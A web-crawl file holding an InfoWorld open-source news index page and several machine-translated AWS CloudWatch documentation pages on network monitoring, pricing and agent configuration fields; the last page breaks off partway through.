https://www.infoworld.com/open-source/ | Open Source | InfoWorld Topics Latest Newsletters Resources Buyer’s Guides About About Us Advertise Contact Us Editorial Ethics Policy Foundry Careers Newsletters Contribute to InfoWorld Reprints Policies Terms of Service Privacy Policy Cookie Policy Copyright Notice Member Preferences About AdChoices Your California Privacy Rights Our Network CIO Computerworld CSO Network World More News Features Blogs BrandPosts Events Videos Enterprise Buyer’s Guides Close Analytics Artificial Intelligence Generative AI Careers Cloud Computing Data Management Databases Emerging Technology Technology Industry Security Software Development Microsoft .NET Development Tools Devops Open Source Programming Languages Java JavaScript Python IT Leadership Enterprise Buyer’s Guides Back Close Back Close Popular Topics Artificial Intelligence Cloud Computing Data Management Software Development Search Topics Latest Newsletters Resources Buyer’s Guides About Policies Our Network More Back Topics Analytics Artificial Intelligence Generative AI Careers Cloud Computing Data Management Databases Emerging Technology Technology Industry Security Software Development Microsoft .NET Development Tools Devops Open Source Programming Languages Java JavaScript Python IT Leadership Enterprise Buyer’s Guides Back About About Us Advertise Contact Us Editorial Ethics Policy Foundry Careers Newsletters Contribute to InfoWorld Reprints Back Policies Terms of Service Privacy Policy Cookie Policy Copyright Notice Member Preferences About AdChoices Your California Privacy Rights Back Our Network CIO Computerworld CSO Network World Back More News Features Blogs BrandPosts Events Videos Enterprise Buyer’s Guides Home Software Development Open Source Open Source Open Source | News, how-tos, features, reviews, and videos Latest from today news Microsoft open-sources XAML Studio Forthcoming update of the rapid prototyping tool for WinUI developers, now available on GitHub, adds a new Fluent UI design, folder support, and a live properties panel. By Paul Krill Jan 8, 2026 1 min Development Tools Integrated Development Environments Visual Studio news It’s everyone but Meta in a new AI standards group By Paul Barker Dec 10, 2025 5 mins Artificial Intelligence Open Source Technology Industry opinion How much will openness matter to AI? By Matt Asay Dec 1, 2025 8 mins Generative AI Open Source Technology Industry news AWS open-sources Agent SOPs to simplify AI agent development By Anirban Ghoshal Nov 24, 2025 3 mins Artificial Intelligence Open Source Software Development news Spam flooding npm registry with token stealers still isn’t under control By Howard Solomon Nov 14, 2025 7 mins Application Security Open Source Security analysis Running managed Ray on Azure Kubernetes Service By Simon Bisson Nov 13, 2025 7 mins Kubernetes Microsoft Azure PyTorch opinion NVIDIA's GTC 2025 A glimpse into our AI-powered future By Raul Leite Nov 7, 2025 7 mins Artificial Intelligence Generative AI Open Source news Malicious npm packages contain Vidar infostealer By Howard Solomon Nov 6, 2025 6 mins Cybercrime Development Tools Malware news Perplexity’s open-source tool to run trillion-parameter models without costly upgrades By Gyana Swain Nov 6, 2025 5 mins Artificial Intelligence Generative AI Open Source Articles news TypeScript rises to the top on GitHub The strongly-typed language recently overtook both JavaScript and Python as the most used language on GitHub, with the rise is attributed to demand for AI-assisted development. By Paul Krill Oct 28, 2025 3 mins JavaScript Python TypeScript analysis Using the SkiaSharp graphics library in .NET Microsoft’s cross-platform .NET takes interesting dependencies, including a fork of Google’s Skia, now to be co-maintained with Uno Platform. By Simon Bisson Oct 23, 2025 8 mins Development Tools Libraries and Frameworks Microsoft .NET analysis Using Valkey on Azure and in .NET Aspire The open source Redis fork is slowly getting support across Microsoft’s various platforms. By Simon Bisson Oct 16, 2025 7 mins Cloud-Native Microsoft .NET Microsoft Azure feature The best Java microframeworks to learn now The Java ecosystem brings you unmatched speed and stability. Here’s our review of seven top-shelf Java microframeworks built for modern, lightweight application development. By Matthew Tyson Oct 15, 2025 14 mins Cloud-Native Java Serverless Computing analysis Unpacking the Microsoft Agent Framework Bringing together two very different ways of building AI applications is a challenging task. Has Microsoft bitten off more than it can chew? By Simon Bisson Oct 9, 2025 8 mins Artificial Intelligence Development Tools Open Source news With Arduino deal, Qualcomm pushes deeper into open-source and edge AI development The chipmaker’s acquisition brings its Dragonwing-powered board and new AppLab development environment to a 33 million–strong open-source community. By Prasanth Aby Thomas Oct 8, 2025 5 mins Engineer Open Source Technology Industry opinion How GitHub won software development Collaborating on code used to be hard. Then Git made branching and merging easy, and GitHub took care of the rest. By Nick Hodges Oct 8, 2025 5 mins Devops Open Source Version Control Systems news JavaFX 25 previews JavaFX controls in title bars Preview feature in latest update of the Java client application platform defines a Stage style that allows applications to place scene graph nodes in the header bar area. By Paul Krill Sep 29, 2025 3 mins Java Libraries and Frameworks Open Source news Open source registries signal shift toward paid models as AI strains infrastructure Eight major foundations warn that the donation-based model for critical infrastructure is breaking down. By Gyana Swain Sep 24, 2025 5 mins Artificial Intelligence Open Source opinion NPM attacks and the security of software supply chains Process improvements and a closer look at funding streams will provide far more protection for the open source software we depend on than isolated guardrails. By Matt Asay Sep 22, 2025 7 mins Cyberattacks Open Source Security Practices opinion Why DocumentDB can be a win for MongoDB If the company can embrace influence rather than control, it has the opportunity to help define the open document standard, which will encourage even more growth in the category. By Matt Asay Sep 1, 2025 8 mins Databases Open Source news MariaDB buys back the company it sold two years ago Acquires SkySQL, returning its DBaaS platform to the product portfolio. By Paul Barker Aug 26, 2025 4 mins Databases Open Source Show more Show less View all Video on demand video How to generate C-like programs with Python You might be familiar with how Python and C can work together, by way of projects like Cython. The new PythoC project has a unique twist on working with both languages: it lets you write type-decorated Python that can generate entire standalone C programs, not just importable Python libraries written in C. This video shows a few basic PythoC functions, from generating a whole program to using some of PythoC’s typing features to provide better memory management than C alone could. Dec 16, 2025 5 mins Python Zed Editor Review: The Rust-Powered IDE That Might Replace VS Code Dec 3, 2025 5 mins Python Python vs. Kotlin Nov 13, 2025 5 mins Python Hands-on with the new sampling profiler in Python 3.15 Nov 6, 2025 6 mins Python See all videos Explore a topic Analytics Artificial Intelligence Careers Cloud Computing Data Management Databases Development Tools Devops Emerging Technology Generative AI Java JavaScript Microsoft .NET Programming Languages View all topics All topics Close Browse all topics and categories below. Analytics Artificial Intelligence Careers Cloud Computing Data Management Databases Development Tools Devops Emerging Technology Generative AI Java JavaScript Microsoft .NET Programming Languages Python Security Software Development Technology Industry Show me more Latest Articles Videos analysis Which development platforms and tools should you learn now? By Isaac Sacolick Jan 13, 2026 8 mins Development Tools Devops Generative AI analysis Why hybrid cloud is the future of enterprise platforms By David Linthicum Jan 13, 2026 4 mins Artificial Intelligence Cloud Architecture Hybrid Cloud news Oracle unveils Java development plans for 2026 By Paul Krill Jan 12, 2026 3 mins Java Programming Languages Software Development video How to make local packages universal across Python venvs Nov 4, 2025 4 mins Python video X-ray vision for your async activity in Python 3.14 Oct 21, 2025 4 mins Python video Why it's so hard to redistribute standalone Python apps Oct 17, 2025 5 mins Python About About Us Advertise Contact Us Editorial Ethics Policy Foundry Careers Reprints Newsletters BrandPosts Policies Terms of Service Privacy Policy Cookie Policy Copyright Notice Member Preferences About AdChoices Your California Privacy Rights Privacy Settings Our Network CIO Computerworld CSO Network World Facebook X YouTube Google News LinkedIn © 2026 FoundryCo, Inc. All Rights Reserved. | 2026-01-13T09:29:26 |
https://docs.aws.amazon.com/it_it/AmazonCloudWatch/latest/monitoring/CloudWatch-NetworkFlowMonitor.html | Utilizzo di Network Flow Monitor - Amazon CloudWatch Utilizzo di Network Flow Monitor - Amazon CloudWatch Documentazione Amazon CloudWatch Guida per l’utente Le traduzioni sono generate tramite traduzione automatica. In caso di conflitto tra il contenuto di una traduzione e la versione originale in Inglese, quest'ultima prevarrà. Utilizzo di Network Flow Monitor Network Flow Monitor offre una visibilità quasi in tempo reale sulle prestazioni di rete per il traffico tra risorse di elaborazione (Amazon EC2 e Amazon Elastic Kubernetes Service), il traffico verso altri AWS servizi (Amazon S3 e Amazon DynamoDB) e il traffico verso la periferia di un altro. Regione AWS Network Flow Monitor raccoglie dati da agenti software leggeri che installi sulle tue istanze. Questi agenti raccolgono statistiche sulle prestazioni dalle connessioni TCP e inviano questi dati al servizio backend Network Flow Monitor, che calcola i principali contributori per ogni tipo di metrica. Network Flow Monitor determina inoltre se AWS è la causa di un problema di rete rilevato e riporta le informazioni relative ai flussi di rete per i quali si sceglie di monitorare i dettagli. È possibile visualizzare le informazioni sulle prestazioni di rete per i flussi di rete relativi alle risorse in un unico account oppure configurare Network Flow Monitor AWS Organizations per visualizzare le informazioni sulle prestazioni di più account in un'organizzazione, accedendo con un account di gestione o amministratore delegato. Network Flow Monitor è destinato agli operatori di rete e agli sviluppatori di applicazioni che desiderano approfondimenti in tempo reale sulle prestazioni della rete. Nella console Network Flow Monitor in CloudWatch, puoi visualizzare i dati sulle prestazioni del traffico di rete delle tue risorse, aggregati dagli agenti e raggruppati in diverse categorie. Ad esempio, puoi visualizzare i dati relativi ai flussi tra zone di disponibilità o tra. VPCs Dopodiché, puoi creare monitoraggi per flussi specifici di cui desideri visualizzare maggiori dettagli o che intendi monitorare più da vicino nel tempo. Utilizzando un monitoraggio, è possibile visualizzare rapidamente la perdita di pacchetti e la latenza delle connessioni di rete in un periodo di tempo specificato. Per ogni monitoraggio, Network Flow Monitor genera anche un indicatore di integrità della rete (NHI). Il valore NHI indica se si sono verificati problemi di AWS rete per i flussi di rete tracciati dal monitor durante il periodo di tempo che state valutando. Utilizzando le informazioni NHI, puoi decidere rapidamente se concentrare le attività di risoluzione dei problemi di rete su un problema di rete o sui problemi di AWS rete originati dai tuoi carichi di lavoro. Per vedere un esempio di configurazione e utilizzo di Network Flow Monitor, consulta il seguente post sul blog: Visualizzazione delle prestazioni di rete dei carichi di lavoro AWS Cloud con Network Flow Monitor. JavaScript è disabilitato o non è disponibile nel tuo browser. Per usare la documentazione AWS, JavaScript deve essere abilitato. Consulta le pagine della guida del browser per le istruzioni. Convenzioni dei documenti Monitoraggio della rete Che cos'è Network Flow Monitor? Questa pagina ti è stata utile? - Sì Grazie per averci comunicato che stiamo facendo un buon lavoro! Se hai un momento, ti invitiamo a dirci che cosa abbiamo fatto che ti è piaciuto così possiamo offrirti altri contenuti simili. Questa pagina ti è stata utile? - No Grazie per averci comunicato che questa pagina ha bisogno di essere modificata. Siamo spiacenti di non aver soddisfatto le tue esigenze. Se hai un momento, ti invitiamo a dirci come possiamo migliorare la documentazione. | 2026-01-13T09:29:26 |
https://docs.aws.amazon.com/de_de/AmazonCloudWatch/latest/monitoring/what-is-network-monitor.html | Verwenden von Network Synthetic Monitor - Amazon CloudWatch Verwenden von Network Synthetic Monitor - Amazon CloudWatch Dokumentation Amazon CloudWatch Benutzer-Leitfaden Schlüssel-Features Terminologie und Komponenten Anforderungen und Einschränkungen Die vorliegende Übersetzung wurde maschinell erstellt. Im Falle eines Konflikts oder eines Widerspruchs zwischen dieser übersetzten Fassung und der englischen Fassung (einschließlich infolge von Verzögerungen bei der Übersetzung) ist die englische Fassung maßgeblich. Verwenden von Network Synthetic Monitor Network Synthetic Monitor bietet Einblick in die Leistung des Netzwerks, das Ihre von AWS gehosteten Anwendungen mit Ihren On-Premises-Zielen verbindet, und ermöglicht es Ihnen, innerhalb von Minuten die Ursache von Netzwerkleistungs-Einbußen zu identifizieren. Network Synthetic Monitor wird vollständig von AWSüberwachten Ressourcen verwaltet und benötigt keine separaten Agenten. Verwenden Sie Network Synthetic Monitor, um Paketverluste und Latenz für Ihre hybriden Netzwerkverbindungen zu visualisieren sowie Alarme und Schwellenwerte festzulegen. Auf der Grundlage dieser Informationen können Sie anschließend Maßnahmen ergreifen, um die Erfahrung Ihrer Endbenutzer zu verbessern. Network Synthetic Monitor richtet sich an Netzwerkbetreiber und Anwendungsentwickler, die in Echtzeit Einblicke in die Netzwerkleistung erhalten möchten. Wichtigste Funktionen von Network Synthetic Monitor Verwenden Sie Network Synthetic Monitor, um Ihre sich verändernde hybride Netzwerkumgebung mit kontinuierlichen Metriken zu Paketverlusten und Latenz in Echtzeit zu vergleichen. Wenn Sie eine Verbindung über Network Synthetic Monitor herstellen AWS Direct Connect, können Sie mithilfe des Network Health Indicator (NHI), den AWS Network Synthetic Monitor auf Ihr CloudWatch Amazon-Konto schreibt, schnell eine Netzwerkverschlechterung innerhalb des Netzwerks diagnostizieren. Die Metrik NHI ist ein binärer Wert, der auf einer probabilistischen Bewertung darüber basiert, ob die Beeinträchtigung im AWS-Netzwerk auftritt. Network Synthetic Monitor bietet einen vollständig verwalteten Überwachungsansatz mit Agenten, sodass Sie weder vor Ort noch vor Ort Agenten installieren müssen. VPCs Sie müssen lediglich ein VPC-Subnetz und eine On-Premises-IP-Adresse angeben, um loszulegen. Sie können eine private Verbindung zwischen Ihren VPC- und Network Synthetic Monitor-Ressourcen herstellen, indem Sie AWS PrivateLink. Weitere Informationen finden Sie unter Die Verwendung von CloudWatch, CloudWatch Synthetics und CloudWatch Network Monitoring mit Schnittstellen-VPC-Endpunkten . Network Synthetic Monitor veröffentlicht Metriken unter CloudWatch Metrics. Sie können Dashboards erstellen, um Ihre Metriken anzuzeigen, und Sie können umsetzbare Schwellenwerte und Alarme für Ihre anwendungsspezifischen Metriken erstellen. Weitere Informationen finden Sie unter Funktionsweise von Network Synthetic Monitor . Terminologie und Komponenten von Network Synthetic Monitor Tests — Eine Sonde ist der Datenverkehr, der von einer AWS-gehosteten Ressource an eine lokale Ziel-IP-Adresse gesendet wird. Die von der Sonde gemessenen Network Synthetic Monitor-Metriken werden für jede Sonde, die in einem Monitor konfiguriert ist, in Ihr CloudWatch Konto geschrieben. Monitor : Ein Monitor zeigt die Netzwerkleistung und andere Zustandsinformationen für Datenverkehr an, für den Sie Sonden in Network Synthetic Monitor erstellt haben. Sie fügen Sonden beim Erstellen eines Monitors hinzu und können dann mithilfe des Monitors Informationen zu Netzwerkleistungsmetriken anzeigen. Wenn Sie einen Monitor für eine Anwendung erstellen, fügen Sie eine AWS gehostete Ressource als Netzwerkquelle hinzu. Network Synthetic Monitor erstellt dann eine Liste aller möglichen Tests zwischen der AWS gehosteten Ressource und Ihren Ziel-IP-Adressen. Sie wählen die Ziele aus, für die Sie den Datenverkehr überwachen möchten. AWS Netzwerkquelle — Eine AWS Netzwerkquelle ist die AWS Ausgangsquelle einer Monitorprobe, bei der es sich um ein Subnetz in einem Ihrer Netzwerke handelt. VPCs Ziel : Dies ist das Ziel in Ihrem On-Premises-Netzwerk für die AWS -Netzwerkquelle. Ein Ziel ist eine Kombination aus Ihren lokalen IP-Adressen, Netzwerkprotokollen, Ports und der Größe der Netzwerkpakete. IPv4 und IPv6 Adressen werden beide unterstützt. Anforderungen und Einschränkungen von Network Synthetic Monitor Im Folgenden werden die Anforderungen und Einschränkungen von Network Synthetic Monitor zusammengefasst. Spezifische Kontingente (oder Beschränkungen) finden Sie unter Network Synthetic Monitor . Monitor-Subnetze müssen sich im Besitz desselben Kontos befinden wie der Monitor. Network Synthetic Monitor bietet kein automatisches Netzwerk-Failover im Falle eines AWS Netzwerkproblems. Für jede Sonde, die Sie erstellen, wird eine Gebühr berechnet. Weitere Details finden Sie unter Preise für Network Synthetic Monitor . JavaScript ist in Ihrem Browser nicht verfügbar oder deaktiviert. Zur Nutzung der AWS-Dokumentation muss JavaScript aktiviert sein. Weitere Informationen finden auf den Hilfe-Seiten Ihres Browsers. Dokumentkonventionen Servicegebundene Rolle Funktionsweise von Network Synthetic Monitor Hat Ihnen diese Seite geholfen? – Ja Vielen Dank, dass Sie uns mitgeteilt haben, dass wir gute Arbeit geleistet haben! Würden Sie sich einen Moment Zeit nehmen, um uns mitzuteilen, was wir richtig gemacht haben, damit wir noch besser werden? Hat Ihnen diese Seite geholfen? – Nein Vielen Dank, dass Sie uns mitgeteilt haben, dass diese Seite überarbeitet werden muss. Es tut uns Leid, dass wir Ihnen nicht weiterhelfen konnten. Würden Sie sich einen Moment Zeit nehmen, um uns mitzuteilen, wie wir die Dokumentation verbessern können? | 2026-01-13T09:29:26 |
https://docs.aws.amazon.com/pt_br/AmazonCloudWatch/latest/monitoring/pricing-nw.html | Preços do Network Synthetic Monitor - Amazon CloudWatch Preços do Network Synthetic Monitor - Amazon CloudWatch Documentação Amazon CloudWatch Guia do usuário Preços do Network Synthetic Monitor Com o Network Synthetic Monitor, não há custos iniciais nem compromissos de longo prazo. O preço do Network Synthetic Monitor tem os dois seguintes componentes: Uma taxa horária por recurso da AWS monitorado Taxas das métricas do CloudWatch Ao criar um monitor no Network Synthetic Monitor, você associa recursos (origens) da AWS a ele que serão monitorados. Para o Network Synthetic Monitor, esses recursos são sub-redes na Amazon Virtual Private Cloud (VPC). Para cada recurso monitorado, você pode criar até quatro sondas, de uma sub-rede na VPC a quatro endereços IP de destino do cliente. Para ajudar a controlar sua fatura, você pode ajustar sua cobertura de sub-rede e de destino de endereço IP on-premises reduzindo o número de recursos monitorados. Para obter mais informações sobre a definição de preços, consulte a página Definição de preços do Amazon CloudWatch . O Javascript está desativado ou não está disponível no seu navegador. Para usar a documentação da AWS, o Javascript deve estar ativado. Consulte as páginas de Ajuda do navegador para obter instruções. Convenções do documento Compatível com Regiões da AWS Operações de API Essa página foi útil? - Sim Obrigado por nos informar que estamos fazendo um bom trabalho! Se tiver tempo, conte-nos sobre o que você gostou para que possamos melhorar ainda mais. Essa página foi útil? - Não Obrigado por nos informar que precisamos melhorar a página. Lamentamos ter decepcionado você. Se tiver tempo, conte-nos como podemos melhorar a documentação. | 2026-01-13T09:29:26 |
https://docs.aws.amazon.com/id_id/AmazonCloudWatch/latest/monitoring/CloudWatch-Agent-Configuration-File-Details.html | Buat atau edit file konfigurasi CloudWatch agen secara manual - Amazon CloudWatch Buat atau edit file konfigurasi CloudWatch agen secara manual - Amazon CloudWatch Dokumentasi Amazon CloudWatch Panduan Pengguna Simpan file konfigusi agen secara manual Unggah file konfigurasi CloudWatch agen ke Systems Manager Parameter Store Terjemahan disediakan oleh mesin penerjemah. Jika konten terjemahan yang diberikan bertentangan dengan versi bahasa Inggris aslinya, utamakan versi bahasa Inggris. Buat atau edit file konfigurasi CloudWatch agen secara manual File konfigurasi CloudWatch agen adalah file JSON dengan empat bagian: agent ,, metrics logs , dan traces . agent bagian ini mencakup kolom untuk konfigurasi agen secara keseluruhan. metrics Bagian ini menentukan metrik kustom untuk pengumpulan dan penerbitan. CloudWatch Jika menggunakan agen hanya untuk mengumpulkan log, Anda dapat menghilangkan bagian metrics dari file. logs Bagian ini menentukan file log apa yang dipublikasikan ke CloudWatch Log. Ini dapat mencakup kejadian dari Windows Event Log (Log Kejadian) jika server menjalankan Server Windows. traces Bagian ini menentukan sumber untuk jejak yang dikumpulkan dan dikirim ke AWS X-Ray. Bagian ini menjelaskan struktur dan bidang file konfigurasi CloudWatch agen. Anda dapat melihat definisi skema untuk file konfigurasi ini. Definisi skema terletak di server Linux dan installation-directory /doc/amazon-cloudwatch-agent-schema.json installation-directory /amazon-cloudwatch-agent-schema.json di server yang menjalankan Windows Server. Jika membuat atau mengedit file konfigurasi agen secara manual, Anda dapat memberinya nama apa pun. Untuk kemudahan dalam pemecahan masalah, kami sarankan Anda menamainya /opt/aws/amazon-cloudwatch-agent/etc/cloudwatch-agent.json di server Linux dan $Env:ProgramData\Amazon\AmazonCloudWatchAgent\amazon-cloudwatch-agent.json pada server yang menjalankan Server Windows. Setelah membuat file, Anda dapat menyalinnya ke server lain tempat Anda ingin melakukan instalasi agen. Ketika agen dimulai, ia membuat salinan dari setiap file konfigurasi dalam /opt/aws/amazon-cloudwatch/etc/amazon-cloudwatch-agent.d direktori, dengan nama file diawali dengan baik file_ (untuk sumber file lokal) atau ssm_ (untuk sumber penyimpanan parameter Systems Manager) untuk menunjukkan asal konfigurasi. catatan Metrik, log, dan jejak yang dikumpulkan oleh CloudWatch agen menimbulkan biaya. Untuk informasi selengkapnya tentang harga, lihat CloudWatchHarga Amazon . Bagian agent dapat mencakup bidang-bidang berikut. Pemandu tidak membuat agent bagian. Sebaliknya, pemandu menghilangkannya dan menggunakan nilai default untuk semua bidang di bagian ini. metrics_collection_interval – Opsional. Menentukan seberapa sering semua metrik yang ditentukan dalam file konfigurasi ini akan dikumpulkan. Anda dapat mengganti nilai ini untuk jenis metrik tertentu. Nilai ini ditentukan dalam detik. Misalnya, menentukan 10 metrik yang akan dikumpulkan setiap 10 detik, dan menetapkannya menjadi 300 metrik kustom untuk dikumpulkan setiap 5 menit. Jika Anda mengatur nilai ini di bawah 60 detik, setiap metrik dikumpulkan sebagai metrik resolusi tinggi. Untuk informasi selengkapnya tentang metrik resolusi tinggi, silakan lihat Metrik resolusi tinggi . Nilai bawaannya adalah 60. region — Menentukan Wilayah yang akan digunakan untuk CloudWatch titik akhir saat EC2 instans Amazon sedang dipantau. Metrik yang dikumpulkan dikirim ke Wilayah ini, seperti us-west-1 . Jika Anda menghilangkan bidang ini, agen akan mengirimkan metrik ke Wilayah tempat EC2 instans Amazon berada. Jika Anda memantau server on-premise, bidang ini tidak digunakan, dan agen membaca Wilayah dari profil AmazonCloudWatchAgent file konfigurasi AWS . credentials — Menentukan peran IAM untuk digunakan saat mengirim metrik, log, dan jejak ke akun yang berbeda. AWS Jika ditentukan, bidang ini berisi satu parameter, role_arn . role_arn — Menentukan Nama Sumber Daya Amazon (ARN) dari peran IAM yang akan digunakan untuk otentikasi saat mengirim metrik, log, dan jejak ke akun lain. AWS Untuk informasi selengkapnya, lihat Mengirim metrik, log, dan jejak ke akun lain . debug – Opsional. Menentukan menjalankan CloudWatch agen dengan pesan log debug. Nilai bawaannya adalah false . aws_sdk_log_level – Opsional. Hanya didukung di versi 1.247350.0 dan agen yang lebih baru. CloudWatch Anda dapat menentukan bidang ini agar agen melakukan pencatatan untuk titik akhir AWS SDK. Nilai untuk bidang ini dapat mencakup satu atau beberapa opsi berikut. Pisahkan beberapa opsi dengan karakter | . LogDebug LogDebugWithSigning LogDebugWithHTTPBody LogDebugRequestRetries LogDebugWithEventStreamBody Untuk informasi selengkapnya tentang opsi ini, lihat LogLevelType . logfile — Menentukan lokasi di mana CloudWatch agen menulis pesan log. Jika Anda menentukan string kosong, log akan beralih ke stderr. Jika Anda tidak menentukan opsi ini, lokasi defaultnya adalah sebagai berikut: Linux: /opt/aws/amazon-cloudwatch-agent/logs/amazon-cloudwatch-agent.log Server Windows: c:\\ProgramData\\Amazon\\CloudWatchAgent\\Logs\\amazon-cloudwatch-agent.log CloudWatch Agen secara otomatis memutar file log yang dibuatnya. File log dirotasi ketika ukurannya mencapai 100 MB. Agen menyimpan file log yang dirotasi selama hingga tujuh hari, dan menyimpan sebanyak lima file log cadangan yang telah dirotasi. File log cadangan memiliki stempel waktu yang ditambahkan ke nama file mereka. Jadwal menunjukkan tanggal dan waktu file dirotasi: misalnya, amazon-cloudwatch-agent-2018-06-08T21-01-50.247.log.gz . omit_hostname – Opsional. Secara bawaan, nama host dipublikasikan sebagai dimensi metrik yang dikumpulkan oleh agen, kecuali jika Anda menggunakan bidang append_dimensions di bagian metrics . Atur omit_hostname ke true untuk mencegah nama host diterbitkan sebagai dimensi bahkan jika Anda tidak menggunakan append_dimensions . Nilai bawaannya adalah false . run_as_user – Opsional. Menentukan pengguna yang akan digunakan untuk menjalankan CloudWatch agen. Jika Anda tidak menetapkan parameter ini, pengguna root akan digunakan. Opsi ini hanya valid di server Linux. Jika Anda menentukan opsi ini, pengguna harus ada sebelum Anda memulai CloudWatch agen. Untuk informasi selengkapnya, lihat Menjalankan CloudWatch agen sebagai pengguna yang berbeda . user_agent – Opsional. Menentukan user-agent string yang digunakan oleh CloudWatch agen ketika membuat panggilan API ke CloudWatch backend. Nilai bawaannya adalah string yang terdiri dari versi agen, versi bahasa pemrograman Go yang digunakan untuk mengompilasi agen, sistem operasi runtime dan arsitektur, waktu pembuatan, dan plugin yang diaktifkan. usage_data – Opsional. Secara default, CloudWatch agen mengirimkan data kesehatan dan kinerja tentang dirinya sendiri CloudWatch kapan pun ia menerbitkan metrik atau log ke. CloudWatch Data ini tidak membebankan biaya untuk Anda. Anda dapat mencegah agen mengirim data ini dengan menentukan false untuk usage_data . Jika Anda menghilangkan parameter ini, default true digunakan dan agen mengirimkan data kesehatan dan performa. Jika menetapkan nilai ini false , Anda harus berhenti dan memulai ulang agen agar berlaku. service.name – Opsional. Menentukan nama layanan yang akan digunakan untuk mengisi entitas untuk menemukan telemetri terkait . deployment.environment – Opsional. Menentukan nama lingkungan yang akan digunakan untuk mengisi entitas untuk menemukan telemetri terkait . use_dualstack_endpoint – Opsional. Jika demikian true , CloudWatch agen akan menggunakan titik akhir tumpukan ganda untuk semua panggilan API. Berikut ini adalah contoh dari sebuah bagian agent . "agent": { "metrics_collection_interval": 60, "region": "us-west-1", "logfile": "/opt/aws/amazon-cloudwatch-agent/logs/amazon-cloudwatch-agent.log", "debug": false, "run_as_user": "cwagent" } Bidang umum untuk Linux dan Windows Pada server yang menjalankan Linux atau Windows Server, metrics bagian ini mencakup kolom berikut: namespace – Opsional. Ruangnama yang digunakan untuk metrik yang dikumpulkan oleh agen. Nilai bawaannya adalah CWAgent . Panjang maksimalnya adalah 255 karakter. Berikut ini salah satu contohnya: { "metrics": { "namespace": "Development/Product1Metrics", ...... }, } append_dimensions – Opsional. Menambahkan dimensi EC2 metrik Amazon ke semua metrik yang dikumpulkan oleh agen. Hal ini juga menyebabkan agen untuk tidak menerbitkan nama host sebagai dimensi. Satu-satunya pasangan nilai kunci yang didukung untuk append_dimensions ditampilkan dalam daftar berikut. Pasangan kunci lainnya diabaikan. Agen mendukung pasangan nilai kunci ini persis seperti yang ditampilkan dalam daftar berikut. Anda tidak dapat mengubah nilai kunci untuk menerbitkan nama dimensi yang berbeda untuknya. "ImageId":"$ { aws:ImageId}" menetapkan AMI ID instans sebagai nilai dari ImageId dimensi. "InstanceId":"$ { aws:InstanceId}" menetapkan ID instans dari instans sebagai nilai InstanceId dimensi. "InstanceType":"$ { aws:InstanceType}" menetapkan tipe instans dari instans sebagai nilai dimensi InstanceType . "AutoScalingGroupName":"$ { aws:AutoScalingGroupName}" menetapkan nama contoh grup Auto Scaling AutoScalingGroupName dimensi tertentu. Jika Anda ingin menambahkan dimensi ke metrik dengan pasangan nilai kunci arbitrer, gunakan append_dimensions di bidang untuk tipe metrik tertentu. Jika Anda menentukan nilai yang bergantung pada EC2 metadata Amazon dan Anda menggunakan proxy, Anda harus memastikan bahwa server dapat mengakses titik akhir untuk Amazon. EC2 Untuk informasi selengkapnya tentang titik akhir ini, lihat Amazon Elastic Compute Cloud EC2 (Amazon) di. Referensi Umum Amazon Web Services aggregation_dimensions – Opsional. Menentukan dimensi yang akan digabungkan dengan metrik yang dikumpulkan. Sebagai contoh, jika Anda menggulir metrik pada AutoScalingGroupName dimensi, metrik dari semua instans dalam setiap kelompok grup Auto Scaling dikumpulkan dan dapat dilihat secara keseluruhan. Anda dapat menggulirkan metrik di sepanjang dimensi tunggal atau ganda. Misalnya, menentukan [["InstanceId"], ["InstanceType"], ["InstanceId","InstanceType"]] mengagregasi metrik untuk ID instans secara tunggal, tipe instans secara tunggal, dan untuk kombinasi kedua dimensi tersebut. Anda juga dapat menentukan [] untuk menggulirkan semua metrik menjadi satu koleksi, mengabaikan semua dimensi. endpoint_override – Menentukan titik akhir FIPS atau tautan privat untuk digunakan sebagai titik akhir tempat agen mengirimkan metrik. Menentukan hal ini dan mengatur tautan privat memungkinkan Anda mengirimkan metrik ke titik akhir VPC Amazon VPC. Untuk informasi selengkapnya, silakan lihat Apa Itu Amazon VPC? . Nilai dari endpoint_override harus string yang berupa URL. Misalnya, bagian berikut dari bagian metrik pada file konfigurasi menetapkan agen untuk menggunakan Titik Akhir VPC saat mengirim metrik. { "metrics": { "endpoint_override": "vpce-XXXXXXXXXXXXXXXXXXXXXXXXX.monitoring.us-east-1.vpce.amazonaws.com", ...... }, } metrics_collected – Wajib. Menentukan metrik mana yang akan dikumpulkan, termasuk metrik kustom yang dikumpulkan melalui atau StatsD atau collectd . Bagian ini mencakup beberapa subbagian. Isi dari metrics_collected bergantung pada apakah file konfigurasi ini untuk server yang menjalankan Linux atau Windows Server. metrics_destinations – Opsional. Menentukan satu atau lebih tujuan untuk semua metrik didefinisikan dalam. metrics_collected Jika ditentukan di sini, itu mengesampingkan tujuan default. cloudwatch cloudwatch — Amazon CloudWatch. amp - Layanan Dikelola Amazon untuk Prometheus. workspace_id — ID yang sesuai dengan Layanan Terkelola Amazon untuk ruang kerja Prometheus. { "metrics": { "metrics_destinations": { "cloudwatch": { }, "amp": { "workspace_id": "ws-abcd1234-ef56-7890-ab12-example" } } } } force_flush_interval – Menentukan dalam hitungan detik lamanya waktu maksimal metrik itu tetap berada dalam buffer memori sebelum dikirim ke server. Apa pun pengaturannya, jika ukuran metrik di buffer mencapai 1 MB atau 1000 metrik berbeda, metrik akan segera dikirim ke server. Nilai bawaannya adalah 60. credentials – Menentukan peran IAM yang akan digunakan saat mengirim metrik ke akun yang berbeda. Jika ditentukan, bidang ini berisi satu parameter, role_arn . role_arn – Menentukan ARN peran IAM yang akan digunakan untuk autentikasi saat mengirim metrik ke akun yang berbeda. Untuk informasi selengkapnya, lihat Mengirim metrik, log, dan jejak ke akun lain . Jika ditentukan di sini, nilai ini akan menggantikan role_arn yang ditentukan dalam agent dari file konfigurasi, jika ada. service.name – Opsional. Menentukan nama layanan yang akan digunakan untuk mengisi entitas untuk menemukan telemetri terkait . deployment.environment – Opsional. Menentukan nama lingkungan yang akan digunakan untuk mengisi entitas untuk menemukan telemetri terkait . Bagian Linux Di server yang menjalankan Linux, metrics_collected bagian file konfigurasi juga dapat berisi bidang-bidang berikut. Banyak dari bidang ini dapat mencakup measurement bagian yang mencantumkan metrik yang ingin Anda kumpulkan untuk sumber daya tersebut. Ini measurement Anda dapat menentukan nama metrik lengkap seperti swap_used , atau hanya bagian dari nama metrik yang akan ditambahkan ke jenis sumber daya. Misalnya, menentukan reads dalam measurement bagian dari diskio menyebabkan diskio_reads metrik yang akan dikumpulkan. collectd – Opsional. Menentukan bahwa Anda ingin mengambil metrik kustom menggunakan collectd protokol. Anda menggunakan collectd perangkat lunak untuk mengirim metrik ke CloudWatch agen. 